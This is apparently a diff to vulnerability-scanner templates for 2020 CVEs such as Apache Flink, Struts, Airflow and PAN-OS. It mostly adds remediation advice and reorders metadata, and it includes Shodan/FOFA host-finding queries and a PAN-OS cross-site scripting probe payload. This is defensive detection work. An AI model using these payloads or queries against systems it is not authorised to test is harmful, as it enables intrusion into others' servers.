a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. + remediation: | + Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2020-17505 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-17505 cwe-id: CWE-78 epss-score: 0.96863 - cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* epss-percentile: 0.99563 + cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 2 vendor: articatech diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index 597e9d806e..f2772e384e 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. + remediation: | + Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506 - http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-17506 cwe-id: CWE-89 epss-score: 0.96091 - cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* epss-percentile: 0.9927 + cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 1 vendor: articatech diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 12c36cbfeb..8ccdfb2ec2 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER. + remediation: | + Upgrade Apache Flink to a version that is not affected by the vulnerability (1.5.2 or later). reference: - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261%40%3Cdev.flink.apache.org%3E @@ -18,8 +20,8 @@ info: cve-id: CVE-2020-17518 cwe-id: CWE-22,CWE-23 epss-score: 0.97465 - cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* epss-percentile: 0.99936 + cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index 00c456afc2..2dd8dba59e 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion). + remediation: | + Apply the latest security patches or upgrade to a patched version of Apache Flink to mitigate the vulnerability. reference: - https://github.com/B1anda0/CVE-2020-17519 - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-17519 cwe-id: CWE-552 epss-score: 0.97432 - cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* epss-percentile: 0.99903 + cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index be2b4d597d..c4416221a8 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -6,27 +6,27 @@ info: severity: high description: | Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session. + remediation: Change default value for [webserver] secret_key config. reference: - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E - http://www.openwall.com/lists/oss-security/2020/12/21/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-17526 - https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E - remediation: Change default value for [webserver] secret_key config. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2020-17526 cwe-id: CWE-287 epss-score: 0.03274 - cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* epss-percentile: 0.90012 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: - max-request: 2 - fofa-query: Apache Airflow verified: true + max-request: 2 vendor: apache product: airflow + fofa-query: Apache Airflow tags: cve,cve2020,apache,airflow,auth-bypass http: diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index b9e9a53fbc..74ac02cae8 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Struts 2.0.0 through Struts 2.5.25 is susceptible to remote code execution because forced OGNL evaluation, when evaluated on raw user input in tag attributes, may allow it. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts. reference: - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html - http://jvn.jp/en/jp/JVN43969166/index.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-17530 cwe-id: CWE-917 epss-score: 0.97161 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* epss-percentile: 0.99704 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index a9295432b9..6a29e60c9e 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability. reference: - https://github.com/zblogcn/zblogphp/issues/216 - https://github.com/zblogcn/zblogphp/issues/209 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-18268 cwe-id: CWE-601 epss-score: 0.00138 - cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* epss-percentile: 0.48623 + cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: zblogcn diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index f2d29583ee..1da9daeaed 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + remediation: | + Upgrade to the latest version of Jeesns or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/zchuanzhao/jeesns/issues/11 - https://www.seebug.org/vuldb/ssvid-97940 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-19282 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* epss-percentile: 0.47974 + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeesns diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index fc9e139808..b4bc6e8dc8 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /newVersion component and allows attackers to execute arbitrary web scripts or HTML. + remediation: | + Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/zchuanzhao/jeesns/issues/10 - https://www.seebug.org/vuldb/ssvid-97939 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-19283 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* epss-percentile: 0.47974 + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeesns diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 5b38c8c898..5caf4140db 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + remediation: | + Upgrade Jeesns to the latest version or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/zchuanzhao/jeesns/issues/21 - https://www.seebug.org/vuldb/ssvid-97950 @@ -15,13 +17,13 @@ info: cve-id: CVE-2020-19295 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* epss-percentile: 0.44609 + cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: title="Jeesns" vendor: jeesns product: jeesns + fofa-query: title="Jeesns" tags: cve,cve2020,jeesns,xss http: diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index ee45e0af97..fe67f8f9bf 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: FHEM version 6.0 suffers from a local file inclusion vulnerability. + remediation: | + Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-19360 cwe-id: CWE-22 epss-score: 0.08829 - cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* epss-percentile: 0.93744 + cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fhem diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index f6b89f585d..09fcc03314 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized. + remediation: | + Upgrade Apache OFBiz to a version higher than 16.11.07 to mitigate this vulnerability. reference: - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E - https://s.apache.org/pr5u8 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-1943 cwe-id: CWE-79 epss-score: 0.9737 - cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* epss-percentile: 0.99851 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index 236c3743b2..1ea948259b 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: - https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting - http://qdpm.net/download-qdpm-free-project-management @@ -16,14 +18,14 @@ info: cve-id: CVE-2020-19515 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* epss-percentile: 0.40864 + cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:762074255 verified: true + max-request: 1 vendor: qdpm product: qdpm + shodan-query: http.favicon.hash:762074255 tags: cve,cve2020,xss,qdpm,unauth http: diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index 0aae32afc9..611ebe8655 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation. + remediation: | + Upgrade to a patched version of Apache Kylin or apply the necessary security patches provided by the vendor. reference: - https://www.sonarsource.com/blog/apache-kylin-command-injection-vulnerability/ - https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706 @@ -18,14 +20,14 @@ info: cve-id: CVE-2020-1956 cwe-id: CWE-78 epss-score: 0.97423 - cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* epss-percentile: 0.99894 + cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: http.favicon.hash:-186961397 + max-request: 2 vendor: apache product: kylin + shodan-query: http.favicon.hash:-186961397 tags: cve,cve2020,apache,kylin,rce,oast,kev variables: username: "{{username}}:" diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index ed04e3f00b..a6d166a2d1 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Gridx. reference: - http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf - https://github.com/oria/gridx/issues/433 @@ -15,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-19625 epss-score: 0.88684 - cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:* epss-percentile: 0.98276 + cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gridx_project diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index ef8b1d207f..806b6b7faf 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md - https://nvd.nist.gov/vuln/detail/CVE-2020-20285 @@ -15,14 +17,14 @@ info: cve-id: CVE-2020-20285 cwe-id: CWE-79 epss-score: 0.0009 - cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* epss-percentile: 0.37386 + cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: zzcms verified: true + max-request: 1 vendor: zzcms product: zzcms + fofa-query: zzcms tags: cve,cve2020,zzcms,xss http: diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index c48904fecb..8af090779c 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: WeiPHP 5.0 contains a SQL injection vulnerability via the wp_where function. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to a patched version of WeiPHP or apply the vendor-supplied patch to fix the SQL Injection vulnerability. reference: - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - https://nvd.nist.gov/vuln/detail/CVE-2020-20300 @@ -15,14 +17,14 @@ info: cve-id: CVE-2020-20300 cwe-id: CWE-89 epss-score: 0.218 - cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* epss-percentile: 0.95816 + cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"WeiPHP5.0" verified: true + max-request: 1 vendor: weiphp product: weiphp + shodan-query: http.html:"WeiPHP5.0" tags: weiphp,sql http: diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 823960027e..4dd46fb321 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. + remediation: | + Apply the latest security patches or updates provided by Palo Alto Networks to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ - https://security.paloaltonetworks.com/CVE-2020-2036 @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-2036 cwe-id: CWE-79 epss-score: 0.00951 - cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* epss-percentile: 0.81231 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: paloaltonetworks @@ -29,11 +31,9 @@ http: - | GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} - - | GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} - - | GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index 1e9d4ddcd3..ca23cd55e7 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability. + remediation: | + Upgrade to the latest version of Jenkins Gitlab Hook plugin (>=1.4.3) to mitigate this vulnerability. reference: - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683 - http://www.openwall.com/lists/oss-security/2020/01/15/1 @@ -16,14 +18,14 @@ info: cve-id: CVE-2020-2096 cwe-id: CWE-79 epss-score: 0.96767 - cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:* epss-percentile: 0.9952 + cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 - shodan-query: http.title:"GitLab" - framework: jenkins vendor: jenkins product: gitlab_hook + framework: jenkins + shodan-query: http.title:"GitLab" tags: jenkins,xss,gitlab,plugin,packetstorm,cve,cve2020 http: diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 32c5eda2cb..c1cfbcad26 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,ritikchaddha severity: critical description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/shadoweb/wdja/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-20982 @@ -14,11 +16,11 @@ info: cve-id: CVE-2020-20982 cwe-id: CWE-79 epss-score: 0.01894 - cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* epss-percentile: 0.87011 + cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: wdja product: wdja_cms tags: cve,cve2020,xss,wdja,shadoweb diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index cc4f588d1d..f9d1805d4b 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://mycvee.blogspot.com/p/xss2.html - https://nvd.nist.gov/vuln/detail/CVE-2020-20988 @@ -15,11 +17,11 @@ info: cve-id: CVE-2020-20988 cwe-id: CWE-79 epss-score: 0.0009 - cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* epss-percentile: 0.37386 + cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: domainmod product: domainmod tags: cve,cve2020,domainmod,xss,authenticated diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index 59cef02474..31aa6b5250 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0. reference: - https://github.com/hitIer/web_test/tree/master/hotel - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2020-21012 cwe-id: CWE-89 epss-score: 0.07545 - cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* epss-percentile: 0.93277 + cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: hotel_and_lodge_booking_management_system_project product: hotel_and_lodge_booking_management_system tags: cve,cve2020,hotel,sqli,unauth diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index aecdea7bd5..8a063330c4 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: medium description: Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Jenkins to a version higher than 2.218 to mitigate the vulnerability. reference: - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 @@ -17,13 +19,13 @@ info: cve-id: CVE-2020-2103 cwe-id: CWE-200 epss-score: 0.00534 - cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* epss-percentile: 0.74191 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 - shodan-query: http.favicon.hash:81586312 vendor: jenkins product: jenkins + shodan-query: http.favicon.hash:81586312 tags: cve,cve2020,jenkins http: diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index e7c35160ec..bdfaa3731c 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server. + remediation: | + Apply the latest security patches or updates provided by Inspur to mitigate this vulnerability. reference: - https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul - https://nvd.nist.gov/vuln/detail/CVE-2020-21224 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-21224 cwe-id: CWE-88 epss-score: 0.03105 - cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* epss-percentile: 0.89779 + cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: inspur diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 9900f50db9..65a34b9dac 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -5,6 +5,8 @@ info: author: j3ssie/geraldino2 severity: medium description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. + remediation: | + Upgrade to the latest version of Jenkin Audit Trail (>=3.3) which includes a fix for this vulnerability. reference: - https://www.jenkins.io/security/advisory/2020-03-09/ - https://nvd.nist.gov/vuln/detail/CVE-2020-2140 @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-2140 cwe-id: CWE-79 epss-score: 0.00181 - cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* epss-percentile: 0.54659 + cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* metadata: max-request: 2 - framework: jenkins vendor: jenkins product: audit_trail + framework: jenkins tags: cve,cve2020,jenkins,xss,plugin http: diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index e77c32ab70..7eb9054678 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php. + remediation: | + Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability. reference: - https://github.com/blindkey/cve_like/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2020-22208 @@ -15,14 +17,14 @@ info: cve-id: CVE-2020-22208 cwe-id: CWE-89 epss-score: 0.10555 - cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* epss-percentile: 0.94277 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="74cms" - shodan-query: http.html:"74cms" vendor: 74cms product: 74cms + shodan-query: http.html:"74cms" + fofa-query: app="74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index d3b7395cc9..09c908ab34 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_common.php file. reference: - https://github.com/blindkey/cve_like/issues/12 - https://nvd.nist.gov/vuln/detail/CVE-2020-22209 @@ -15,14 +17,14 @@ info: cve-id: 